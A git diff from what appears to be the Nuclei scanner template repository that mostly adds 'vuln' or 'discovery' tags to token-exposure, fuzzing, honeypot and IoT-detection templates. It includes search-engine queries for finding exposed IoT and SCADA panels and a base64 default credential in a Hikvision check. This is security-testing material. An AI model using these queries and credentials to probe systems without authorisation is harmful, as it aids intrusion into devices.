twitter,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/twitter/twitter-client-id.yaml b/http/exposures/tokens/twitter/twitter-client-id.yaml index a76942f583d..cbcc5a1b895 100644 --- a/http/exposures/tokens/twitter/twitter-client-id.yaml +++ b/http/exposures/tokens/twitter/twitter-client-id.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: twitter,exposure,tokens + tags: twitter,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/twitter/twitter-secret-key.yaml b/http/exposures/tokens/twitter/twitter-secret-key.yaml index 9a84fa10b83..8ea2e9db781 100644 --- a/http/exposures/tokens/twitter/twitter-secret-key.yaml +++ b/http/exposures/tokens/twitter/twitter-secret-key.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: twitter,exposure,tokens + tags: twitter,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/typeform/typeform-api-token.yaml b/http/exposures/tokens/typeform/typeform-api-token.yaml index 6235f833074..1abb2f649c6 100644 --- a/http/exposures/tokens/typeform/typeform-api-token.yaml +++ b/http/exposures/tokens/typeform/typeform-api-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: typeform,exposure,tokens + tags: typeform,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/vault/vault-batch-token.yaml b/http/exposures/tokens/vault/vault-batch-token.yaml index 6d0bc41bd59..c3a19ebd0c0 100644 --- a/http/exposures/tokens/vault/vault-batch-token.yaml +++ b/http/exposures/tokens/vault/vault-batch-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: vault,exposure,tokens + tags: vault,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/vault/vault-service-token.yaml b/http/exposures/tokens/vault/vault-service-token.yaml index 79ac159d053..ab28aaff862 100644 --- a/http/exposures/tokens/vault/vault-service-token.yaml +++ b/http/exposures/tokens/vault/vault-service-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: vault,exposure,tokens + tags: vault,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/wechat/wechat-secret-key.yaml b/http/exposures/tokens/wechat/wechat-secret-key.yaml index e5a0f092d6f..e77c9e268e6 100644 --- a/http/exposures/tokens/wechat/wechat-secret-key.yaml +++ b/http/exposures/tokens/wechat/wechat-secret-key.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: wechat,exposure,tencent + tags: wechat,exposure,tencent,vuln http: - method: GET diff --git a/http/exposures/tokens/wireguard/wireguard-preshared-key.yaml b/http/exposures/tokens/wireguard/wireguard-preshared-key.yaml index 2271d1d4173..12f62acdb4c 100644 --- a/http/exposures/tokens/wireguard/wireguard-preshared-key.yaml +++ b/http/exposures/tokens/wireguard/wireguard-preshared-key.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: wireguard,exposure,tokens + tags: wireguard,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/wireguard/wireguard-private-key.yaml b/http/exposures/tokens/wireguard/wireguard-private-key.yaml index c00329d4986..42fe36e3dad 100644 --- a/http/exposures/tokens/wireguard/wireguard-private-key.yaml +++ b/http/exposures/tokens/wireguard/wireguard-private-key.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: wireguard,exposure,tokens + tags: wireguard,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/yandex/yandex-access-token.yaml b/http/exposures/tokens/yandex/yandex-access-token.yaml index 33817e7e45d..3dc8514ee39 100644 --- a/http/exposures/tokens/yandex/yandex-access-token.yaml +++ b/http/exposures/tokens/yandex/yandex-access-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: yandex,exposure,tokens + tags: yandex,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/yandex/yandex-api-key.yaml b/http/exposures/tokens/yandex/yandex-api-key.yaml index b70c4d9410a..ca3e3f0570e 100644 --- a/http/exposures/tokens/yandex/yandex-api-key.yaml +++ b/http/exposures/tokens/yandex/yandex-api-key.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: yandex,exposure,tokens + tags: yandex,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/yandex/yandex-aws-access-token.yaml b/http/exposures/tokens/yandex/yandex-aws-access-token.yaml index cc3ece4256e..78e29bdf28c 100644 --- a/http/exposures/tokens/yandex/yandex-aws-access-token.yaml +++ b/http/exposures/tokens/yandex/yandex-aws-access-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: yandex,exposure,tokens + tags: yandex,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/zapier/zapier-webhook-token.yaml b/http/exposures/tokens/zapier/zapier-webhook-token.yaml index 23da6a3531f..6ac7d79faf2 100755 --- a/http/exposures/tokens/zapier/zapier-webhook-token.yaml +++ b/http/exposures/tokens/zapier/zapier-webhook-token.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: exposure,token + tags: exposure,token,vuln http: - method: GET diff --git a/http/exposures/tokens/zendesk/zendesk-key.yaml b/http/exposures/tokens/zendesk/zendesk-key.yaml index 51fe1cf594d..56e7dc9332e 100644 --- a/http/exposures/tokens/zendesk/zendesk-key.yaml +++ b/http/exposures/tokens/zendesk/zendesk-key.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: zendesk,exposure,tokens + tags: zendesk,exposure,tokens,vuln http: - method: GET diff --git a/http/exposures/tokens/zenserp/zenscrape-api-key.yaml b/http/exposures/tokens/zenserp/zenscrape-api-key.yaml index 9ea35b1fabd..396eb8071d9 100644 --- a/http/exposures/tokens/zenserp/zenscrape-api-key.yaml +++ b/http/exposures/tokens/zenserp/zenscrape-api-key.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 2 verified: true - tags: exposure,token,zenscrape,apikey + tags: exposure,token,zenscrape,apikey,vuln flow: http(1) && http(2) diff --git a/http/exposures/tokens/zenserp/zenserp-api-key.yaml b/http/exposures/tokens/zenserp/zenserp-api-key.yaml index 6d802a6c84e..4419797d26b 100644 --- a/http/exposures/tokens/zenserp/zenserp-api-key.yaml +++ b/http/exposures/tokens/zenserp/zenserp-api-key.yaml @@ -8,7 +8,7 @@ info: - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zenserp/zenserp.go metadata: max-request: 2 - tags: exposure,token,zenserp,apikey + tags: exposure,token,zenserp,apikey,vuln flow: http(1) && http(2) diff --git a/http/exposures/tokens/zoho/zoho-webhook-token.yaml b/http/exposures/tokens/zoho/zoho-webhook-token.yaml index 3264b4942be..bfa4cd2c684 100755 --- a/http/exposures/tokens/zoho/zoho-webhook-token.yaml +++ b/http/exposures/tokens/zoho/zoho-webhook-token.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: exposure,token,zoho + tags: exposure,token,zoho,vuln http: - method: GET diff --git a/http/fuzzing/cache-poisoning-fuzz.yaml b/http/fuzzing/cache-poisoning-fuzz.yaml index e9d7a574bde..faa23f9144f 100644 --- a/http/fuzzing/cache-poisoning-fuzz.yaml +++ b/http/fuzzing/cache-poisoning-fuzz.yaml @@ -9,7 +9,7 @@ info: - https://portswigger.net/web-security/web-cache-poisoning metadata: max-request: 5834 - tags: fuzz,cache,fuzzing + tags: fuzz,cache,fuzzing,vuln http: - raw: diff --git a/http/fuzzing/header-command-injection.yaml b/http/fuzzing/header-command-injection.yaml index a87429a0c4f..35fe13b2836 100644 --- a/http/fuzzing/header-command-injection.yaml +++ b/http/fuzzing/header-command-injection.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-77 metadata: max-request: 7650 - tags: fuzz,rce,fuzzing + tags: fuzz,rce,fuzzing,vuln http: - raw: diff --git a/http/fuzzing/iis-shortname.yaml b/http/fuzzing/iis-shortname.yaml index 641b89aeba0..628525f86e5 100644 --- a/http/fuzzing/iis-shortname.yaml +++ b/http/fuzzing/iis-shortname.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-200 metadata: max-request: 4 - tags: iis,edb,fuzzing + tags: iis,edb,fuzzing,vuln http: - raw: diff --git a/http/fuzzing/linux-lfi-fuzzing.yaml b/http/fuzzing/linux-lfi-fuzzing.yaml index b2289f39e92..cf9e6fb06af 100644 --- a/http/fuzzing/linux-lfi-fuzzing.yaml +++ b/http/fuzzing/linux-lfi-fuzzing.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 22 - tags: linux,lfi,fuzz,fuzzing + tags: linux,lfi,fuzz,fuzzing,vuln http: - method: GET diff --git a/http/fuzzing/mdb-database-file.yaml b/http/fuzzing/mdb-database-file.yaml index aa9a97eb16a..fa5d420d7f4 100644 --- a/http/fuzzing/mdb-database-file.yaml +++ b/http/fuzzing/mdb-database-file.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 341 - tags: fuzz,mdb,asp,fuzzing + tags: fuzz,mdb,asp,fuzzing,vuln http: - raw: diff --git a/http/fuzzing/prestashop-module-fuzz.yaml b/http/fuzzing/prestashop-module-fuzz.yaml index c7b74e0e353..15e78e624b0 100644 --- a/http/fuzzing/prestashop-module-fuzz.yaml +++ b/http/fuzzing/prestashop-module-fuzz.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 639 - tags: fuzz,prestashop,fuzzing + tags: fuzz,prestashop,fuzzing,vuln http: - raw: diff --git a/http/fuzzing/ssrf-via-proxy.yaml b/http/fuzzing/ssrf-via-proxy.yaml index 72fddcf854b..1bbc747d082 100644 --- a/http/fuzzing/ssrf-via-proxy.yaml +++ b/http/fuzzing/ssrf-via-proxy.yaml @@ -10,7 +10,7 @@ info: - https://twitter.com/ImoJOnDz/status/1649089777629827072 metadata: max-request: 9 - tags: ssrf,proxy,oast,fuzz,fuzzing + tags: ssrf,proxy,oast,fuzz,fuzzing,vuln http: - payloads: diff --git a/http/fuzzing/waf-fuzz.yaml b/http/fuzzing/waf-fuzz.yaml index 0ef7cd78b95..e1d544958f4 100644 --- a/http/fuzzing/waf-fuzz.yaml +++ b/http/fuzzing/waf-fuzz.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 58 - tags: waf,fuzz,fuzzing + tags: waf,fuzz,fuzzing,vuln http: - raw: diff --git a/http/fuzzing/windows-lfi-fuzzing.yaml b/http/fuzzing/windows-lfi-fuzzing.yaml index 2b3bba97b98..5c0bdda738f 100644 --- a/http/fuzzing/windows-lfi-fuzzing.yaml +++ b/http/fuzzing/windows-lfi-fuzzing.yaml @@ -6,7 +6,7 @@ info: severity: high description: | Fuzzing for /windows/win.ini. - tags: fuzz,windows,lfi,fuzzing + tags: fuzz,windows,lfi,fuzzing,vuln http: - method: GET diff --git a/http/fuzzing/wordpress-plugins-detect.yaml b/http/fuzzing/wordpress-plugins-detect.yaml index f1b44da7dc8..430be7c697c 100644 --- a/http/fuzzing/wordpress-plugins-detect.yaml +++ b/http/fuzzing/wordpress-plugins-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 100563 - tags: fuzz,wordpress,fuzzing + tags: fuzz,wordpress,fuzzing,vuln http: - raw: diff --git a/http/fuzzing/wordpress-themes-detect.yaml b/http/fuzzing/wordpress-themes-detect.yaml index 4926b2602ca..65297aa0ac0 100644 --- a/http/fuzzing/wordpress-themes-detect.yaml +++ b/http/fuzzing/wordpress-themes-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 24434 - tags: fuzz,wordpress,fuzzing + tags: fuzz,wordpress,fuzzing,vuln http: - raw: diff --git a/http/fuzzing/wordpress-weak-credentials.yaml b/http/fuzzing/wordpress-weak-credentials.yaml index 7ac15702fb5..cae8935f0b6 100644 --- a/http/fuzzing/wordpress-weak-credentials.yaml +++ b/http/fuzzing/wordpress-weak-credentials.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-1391 metadata: max-request: 276 - tags: wordpress,default-login,fuzz,fuzzing + tags: wordpress,default-login,fuzz,fuzzing,vuln http: - raw: diff --git a/http/fuzzing/xff-403-bypass.yaml b/http/fuzzing/xff-403-bypass.yaml index 23a4e762d94..1b8dcf5f29a 100644 --- a/http/fuzzing/xff-403-bypass.yaml +++ b/http/fuzzing/xff-403-bypass.yaml @@ -7,7 +7,7 @@ info: description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. metadata: max-request: 3 - tags: fuzzing,xff-403-bypass + tags: fuzzing,xff-403-bypass,vuln http: - raw: diff --git a/http/global-matchers/global-waf-detect.yaml b/http/global-matchers/global-waf-detect.yaml index 869c6d77419..433022b6640 100644 --- a/http/global-matchers/global-waf-detect.yaml +++ b/http/global-matchers/global-waf-detect.yaml @@ -7,7 +7,7 @@ info: description: This global matcher detects WAFs metadata: max-request: 0 - tags: waf-detect + tags: waf-detect,discovery http: - global-matchers: true diff --git a/http/global-matchers/secrets-patterns-rules.yaml b/http/global-matchers/secrets-patterns-rules.yaml index fdd341015e5..b66dadebddd 100644 --- a/http/global-matchers/secrets-patterns-rules.yaml +++ b/http/global-matchers/secrets-patterns-rules.yaml @@ -6,7 +6,7 @@ info: reference: - https://github.com/mazen160/secrets-patterns-db # db/rules-stable.yml (151eaf659f3bcac3f81161808765eaa91045f2c7) severity: info - tags: global-matchers,exposure,token,key,api,secret,password,generic + tags: global-matchers,exposure,token,key,api,secret,password,generic,vuln http: - global-matchers: true diff --git a/http/honeypot/citrix-honeypot-detect.yaml b/http/honeypot/citrix-honeypot-detect.yaml index 113b1875f1f..97148848501 100644 --- a/http/honeypot/citrix-honeypot-detect.yaml +++ b/http/honeypot/citrix-honeypot-detect.yaml @@ -17,7 +17,7 @@ info: - http.title:“citrix login” fofa-query: title=“citrix login” google-query: intitle:“citrix login” - tags: citrix,honeypot,ir,cti + tags: citrix,honeypot,ir,cti,discovery http: - method: GET diff --git a/http/honeypot/dionaea-http-honeypot-detect.yaml b/http/honeypot/dionaea-http-honeypot-detect.yaml index 7c9448281c9..4dee0aac6fd 100644 --- a/http/honeypot/dionaea-http-honeypot-detect.yaml +++ b/http/honeypot/dionaea-http-honeypot-detect.yaml @@ -12,7 +12,7 @@ info: vendor: dionaea product: http shodan-query: '"python/3.10 aiohttp/3.8.3" && bad status' - tags: dionaea,honeypot,ir,cti + tags: dionaea,honeypot,ir,cti,discovery http: - raw: diff --git a/http/honeypot/elasticpot-honeypot-detect.yaml b/http/honeypot/elasticpot-honeypot-detect.yaml index eadb99749f6..c74af712924 100644 --- a/http/honeypot/elasticpot-honeypot-detect.yaml +++ b/http/honeypot/elasticpot-honeypot-detect.yaml @@ -12,7 +12,7 @@ info: vendor: elasticpot product: elasticsearch fofa-query: "index_not_found_exception" - tags: elasticpot,elasticsearch,honeypot,ir,cti + tags: elasticpot,elasticsearch,honeypot,ir,cti,discovery http: - method: GET diff --git a/http/honeypot/snare-honeypot-detect.yaml b/http/honeypot/snare-honeypot-detect.yaml index 935ac95300a..5e1b6eea2ac 100644 --- a/http/honeypot/snare-honeypot-detect.yaml +++ b/http/honeypot/snare-honeypot-detect.yaml @@ -15,7 +15,7 @@ info: shodan-query: - '"Python/3.10 aiohttp/3.8.3" && Bad status' - '"python/3.10 aiohttp/3.8.3" && bad status' - tags: snare,honeypot,ir,cti + tags: snare,honeypot,ir,cti,discovery http: - raw: diff --git a/http/honeypot/tpot-honeypot-detect.yaml b/http/honeypot/tpot-honeypot-detect.yaml index 5bc0d197a95..05d9a045984 100644 --- a/http/honeypot/tpot-honeypot-detect.yaml +++ b/http/honeypot/tpot-honeypot-detect.yaml @@ -1,5 +1,5 @@ -id: tpot-honeypot-detect - +id: tpot-honeypot-detect + info: name: T-Pot Honeypot - Detect author: rxerium @@ -10,23 +10,23 @@ info: - https://github.com/telekom-security/tpotce metadata: max-request: 1 - tags: tpot,honeypot -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "T-Pot" - - "T-Pot @ Github" - - "T-Pot ReadMe" - condition: and - - - type: status - status: + tags: tpot,honeypot,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "T-Pot" + - "T-Pot @ Github" + - "T-Pot ReadMe" + condition: and + + - type: status + status: - 200 # digest: 4b0a00483046022100b83df7f8bded148c42a5c032a4dafaf357b4cba8183a6708500d97587e72aa62022100e0c30c3b23fca72854d14704f7e5113be1bfb40f42af0da0b0947afeccce09b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/iot/ampguard-wifi-setup.yaml b/http/iot/ampguard-wifi-setup.yaml index 0b284fb5a8a..36d9140eba7 100644 --- a/http/iot/ampguard-wifi-setup.yaml +++ b/http/iot/ampguard-wifi-setup.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"AmpGuard wifi setup" - tags: ampguard,iot,setup,wifi + tags: ampguard,iot,setup,wifi,discovery http: - method: GET diff --git a/http/iot/apc-ups-login.yaml b/http/iot/apc-ups-login.yaml index a56f4193815..fbae8106ac8 100644 --- a/http/iot/apc-ups-login.yaml +++ b/http/iot/apc-ups-login.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: title:"APC | Log On" - tags: iot,panel + tags: iot,panel,discovery http: - method: GET diff --git a/http/iot/automation-direct.yaml b/http/iot/automation-direct.yaml index 7408945bed3..12f66c6eacf 100644 --- a/http/iot/automation-direct.yaml +++ b/http/iot/automation-direct.yaml @@ -18,7 +18,7 @@ info: google-query: intitle:"C-more -- the best HMI presented by AutomationDirect" product: ea9-t6cl vendor: automationdirect - tags: panel,iot,edb + tags: panel,iot,edb,discovery http: - method: GET diff --git a/http/iot/brother-printer-detect.yaml b/http/iot/brother-printer-detect.yaml index 3c0347c579e..84a00fe25e2 100644 --- a/http/iot/brother-printer-detect.yaml +++ b/http/iot/brother-printer-detect.yaml @@ -8,7 +8,7 @@ info: reference: https://www.exploit-db.com/ghdb/6889 metadata: max-request: 1 - tags: iot,printer,tech + tags: iot,printer,tech,discovery http: - method: GET diff --git a/http/iot/brother-unauthorized-access.yaml b/http/iot/brother-unauthorized-access.yaml index 42e0a2e6622..3870c8ffded 100644 --- a/http/iot/brother-unauthorized-access.yaml +++ b/http/iot/brother-unauthorized-access.yaml @@ -8,7 +8,7 @@ info: reference: https://www.exploit-db.com/ghdb/6889 metadata: max-request: 1 - tags: iot,printer,unauth + tags: iot,printer,unauth,vuln,discovery http: - method: GET diff --git a/http/iot/cae-monitor-panel.yaml b/http/iot/cae-monitor-panel.yaml index fe9096babf4..fbe1f1cb948 100644 --- a/http/iot/cae-monitor-panel.yaml +++ b/http/iot/cae-monitor-panel.yaml @@ -10,7 +10,7 @@ info: shodan-query: http.favicon.hash:-268676052 verified: true max-request: 1 - tags: cae,login,panel,detect + tags: cae,login,panel,detect,discovery http: - method: GET diff --git a/http/iot/carel-plantvisor-panel.yaml b/http/iot/carel-plantvisor-panel.yaml index a595060ea61..c63add5f8df 100644 --- a/http/iot/carel-plantvisor-panel.yaml +++ b/http/iot/carel-plantvisor-panel.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: title:"CAREL Pl@ntVisor" - tags: panels,scada,iot,carel + tags: panels,scada,iot,carel,discovery http: - method: GET diff --git a/http/iot/codian-mcu-login.yaml b/http/iot/codian-mcu-login.yaml index 880eb43a85b..862093b6c04 100644 --- a/http/iot/codian-mcu-login.yaml +++ b/http/iot/codian-mcu-login.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Codian MCU - Home page" - tags: iot,edb + tags: iot,edb,discovery http: - method: GET diff --git a/http/iot/contacam.yaml b/http/iot/contacam.yaml index d441628343c..a7cbb6f2ba8 100644 --- a/http/iot/contacam.yaml +++ b/http/iot/contacam.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: edb,iot + tags: edb,iot,discovery http: - method: GET diff --git a/http/iot/dell-laser-printer-unauth.yaml b/http/iot/dell-laser-printer-unauth.yaml index 7f7404f84fb..ea8226f224a 100644 --- a/http/iot/dell-laser-printer-unauth.yaml +++ b/http/iot/dell-laser-printer-unauth.yaml @@ -10,7 +10,7 @@ info: max-request: 1 shodan-query: title="Laser Printer" verified: true - tags: dell,iot,unauth,misconfig,printer + tags: dell,iot,unauth,misconfig,printer,vuln,discovery flow: http(1) && http(2) diff --git a/http/iot/emerson-intellislot-webcard.yaml b/http/iot/emerson-intellislot-webcard.yaml index d2e4238c0f2..d93d82cd092 100644 --- a/http/iot/emerson-intellislot-webcard.yaml +++ b/http/iot/emerson-intellislot-webcard.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: 'http.title:"Emerson Network Power IntelliSlot Web Card"' - tags: emerson,intellislot,iot,misconfig,exposure + tags: emerson,intellislot,iot,misconfig,exposure,discovery http: - method: GET diff --git a/http/iot/envision-gateway.yaml b/http/iot/envision-gateway.yaml index f7a2b486ce2..461200b201d 100644 --- a/http/iot/envision-gateway.yaml +++ b/http/iot/envision-gateway.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"EnvisionGateway" - tags: iot,edb + tags: iot,edb,discovery http: - method: GET diff --git a/http/iot/epmp-login.yaml b/http/iot/epmp-login.yaml index 444847b7dcb..fe4e515052f 100644 --- a/http/iot/epmp-login.yaml +++ b/http/iot/epmp-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,edb,iot + tags: panel,edb,iot,discovery http: - method: GET diff --git a/http/iot/epson-wf-series.yaml b/http/iot/epson-wf-series.yaml index 301a1231dde..0f8cfc8c2aa 100644 --- a/http/iot/epson-wf-series.yaml +++ b/http/iot/epson-wf-series.yaml @@ -7,7 +7,7 @@ info: description: Searches for Epson WF series printers on the domain metadata: max-request: 1 - tags: iot,printer + tags: iot,printer,discovery http: - method: GET diff --git a/http/iot/etic-telecom-panel.yaml b/http/iot/etic-telecom-panel.yaml index f9ec352da78..bb4a55a94ab 100644 --- a/http/iot/etic-telecom-panel.yaml +++ b/http/iot/etic-telecom-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"ETIC Telecom" - tags: etic,panel,login + tags: etic,panel,login,discovery http: - method: GET diff --git a/http/iot/geovision-lfi.yaml b/http/iot/geovision-lfi.yaml index 6c2921d3221..ad4eddd8c22 100644 --- a/http/iot/geovision-lfi.yaml +++ b/http/iot/geovision-lfi.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: "Server:Cross Web Server" - tags: geovision,lfi,cross-web,webclient,iot + tags: geovision,lfi,cross-web,webclient,iot,vuln http: - raw: diff --git a/http/iot/grandstream-device-configuration.yaml b/http/iot/grandstream-device-configuration.yaml index c1f31a73f22..69acca7f089 100644 --- a/http/iot/grandstream-device-configuration.yaml +++ b/http/iot/grandstream-device-configuration.yaml @@ -12,7 +12,7 @@ info: vendor: grandstream product: ht801_firmware shodan-query: http.title:"Grandstream Device Configuration" - tags: iot + tags: iot,discovery http: - method: GET diff --git a/http/iot/heatmiser-wifi-thermostat.yaml b/http/iot/heatmiser-wifi-thermostat.yaml index da738226f4f..948127a0fec 100644 --- a/http/iot/heatmiser-wifi-thermostat.yaml +++ b/http/iot/heatmiser-wifi-thermostat.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Heatmiser Wifi Thermostat" - tags: iot,edb + tags: iot,edb,discovery http: - method: GET diff --git a/http/iot/hikvision-cam-info-exposure.yaml b/http/iot/hikvision-cam-info-exposure.yaml index a59fe0963a0..0b9b01e157c 100644 --- a/http/iot/hikvision-cam-info-exposure.yaml +++ b/http/iot/hikvision-cam-info-exposure.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: 3.1.3.150324 - tags: hikvision,iot,camera,exposure + tags: hikvision,iot,camera,exposure,discovery variables: b64auth: YWRtaW46MTEK diff --git a/http/iot/homeworks-illumination.yaml b/http/iot/homeworks-illumination.yaml index bb9fef87c5d..7cd4f28274e 100644 --- a/http/iot/homeworks-illumination.yaml +++ b/http/iot/homeworks-illumination.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: html:"HomeWorks Illumination Web Keypad" - tags: misconfig,iot,homeworks + tags: misconfig,iot,homeworks,discovery http: - method: GET diff --git a/http/iot/honeywell-building-control.yaml b/http/iot/honeywell-building-control.yaml index d1ba7525b6e..979e38c973c 100644 --- a/http/iot/honeywell-building-control.yaml +++ b/http/iot/honeywell-building-control.yaml @@ -12,7 +12,7 @@ info: vendor: honeywell product: alerton_ascent_control_module shodan-query: html:"Honeywell Building Control" - tags: panel,iot + tags: panel,iot,discovery http: - method: GET diff --git a/http/iot/hp-color-laserjet-detect.yaml b/http/iot/hp-color-laserjet-detect.yaml index 83ebd6361b4..e7d4bc5476a 100644 --- a/http/iot/hp-color-laserjet-detect.yaml +++ b/http/iot/hp-color-laserjet-detect.yaml @@ -17,7 +17,7 @@ info: product: color_laserjet_pro_mfp_m183_7kw56a shodan-query: http.title:"HP Color LaserJet" google-query: intitle:"HP Color LaserJet" - tags: iot,hp + tags: iot,hp,discovery http: - method: GET diff --git a/http/iot/hp-device-info-detect.yaml b/http/iot/hp-device-info-detect.yaml index 4293f2d0718..daf6d409c1a 100644 --- a/http/iot/hp-device-info-detect.yaml +++ b/http/iot/hp-device-info-detect.yaml @@ -8,7 +8,7 @@ info: reference: https://www.exploit-db.com/ghdb/6905 metadata: max-request: 1 - tags: iot,hp + tags: iot,hp,discovery http: - method: GET diff --git a/http/iot/hp-laserjet-detect.yaml b/http/iot/hp-laserjet-detect.yaml index a3d993c99a1..85aa0e78edc 100644 --- a/http/iot/hp-laserjet-detect.yaml +++ b/http/iot/hp-laserjet-detect.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: iot,edb + tags: iot,edb,discovery http: - method: GET diff --git a/http/iot/huawei-home-gateway.yaml b/http/iot/huawei-home-gateway.yaml index f05c679cc26..4b301dfe8ba 100644 --- a/http/iot/huawei-home-gateway.yaml +++ b/http/iot/huawei-home-gateway.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"HUAWEI Home Gateway HG658d" - tags: iot,huawei + tags: iot,huawei,discovery http: - method: GET diff --git a/http/iot/hue-personal-wireless-panel.yaml b/http/iot/hue-personal-wireless-panel.yaml index c544f533ec7..b5199cf40fd 100644 --- a/http/iot/hue-personal-wireless-panel.yaml +++ b/http/iot/hue-personal-wireless-panel.yaml @@ -12,7 +12,7 @@ info: vendor: philips product: hue shodan-query: title:"hue personal wireless lighting" - tags: hue,iot,wireless + tags: hue,iot,wireless,discovery http: - method: GET diff --git a/http/iot/internet-service.yaml b/http/iot/internet-service.yaml index ab911f219c8..b2d55d29b63 100644 --- a/http/iot/internet-service.yaml +++ b/http/iot/internet-service.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: iot,edb,panel + tags: iot,edb,panel,discovery http: - method: GET diff --git a/http/iot/iotawatt-app-exposure.yaml b/http/iot/iotawatt-app-exposure.yaml index 468cfabfefd..8727cdcfc2f 100644 --- a/http/iot/iotawatt-app-exposure.yaml +++ b/http/iot/iotawatt-app-exposure.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 fofa-query: app="IoTaWatt-Configuration-app" - tags: iot,exposure + tags: iot,exposure,vuln,discovery http: - method: GET diff --git a/http/iot/ip-webcam.yaml b/http/iot/ip-webcam.yaml index 04bf795dd8d..520635ac7f3 100644 --- a/http/iot/ip-webcam.yaml +++ b/http/iot/ip-webcam.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-601917817 - tags: webcam,iot,detect + tags: webcam,iot,detect,discovery http: - method: GET diff --git a/http/iot/kevinlab-device-detect.yaml b/http/iot/kevinlab-device-detect.yaml index 48345156ebe..5c7d87fb065 100644 --- a/http/iot/kevinlab-device-detect.yaml +++ b/http/iot/kevinlab-device-detect.yaml @@ -7,7 +7,7 @@ info: description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings by collecting and analyzing various information of energy usage and facilities as well as efficiency and indoor environment control. metadata: max-request: 2 - tags: iot,kevinlab + tags: iot,kevinlab,discovery http: - method: GET diff --git a/http/iot/kyocera-printer-panel.yaml b/http/iot/kyocera-printer-panel.yaml index a7b6050cdc1..dc3c4eb605d 100644 --- a/http/iot/kyocera-printer-panel.yaml +++ b/http/iot/kyocera-printer-panel.yaml @@ -13,7 +13,7 @@ info: product: d-copia253mf_plus_firmware vendor: kyocera fofa-query: icon_hash=-50306417 - tags: iot,panel,kyocera,printer + tags: iot,panel,kyocera,printer,discovery http: - method: GET diff --git a/http/iot/labview-service-locator-enum.yaml b/http/iot/labview-service-locator-enum.yaml index 954c0f4cc10..cad43b539a1 100644 --- a/http/iot/labview-service-locator-enum.yaml +++ b/http/iot/labview-service-locator-enum.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:1192389544 port:3580 - tags: detect,labview,panel,enumeration + tags: detect,labview,panel,enumeration,discovery http: - method: GET diff --git a/http/iot/liveview-axis-camera.yaml b/http/iot/liveview-axis-camera.yaml index 9efae1b83b2..a031da854b1 100644 --- a/http/iot/liveview-axis-camera.yaml +++ 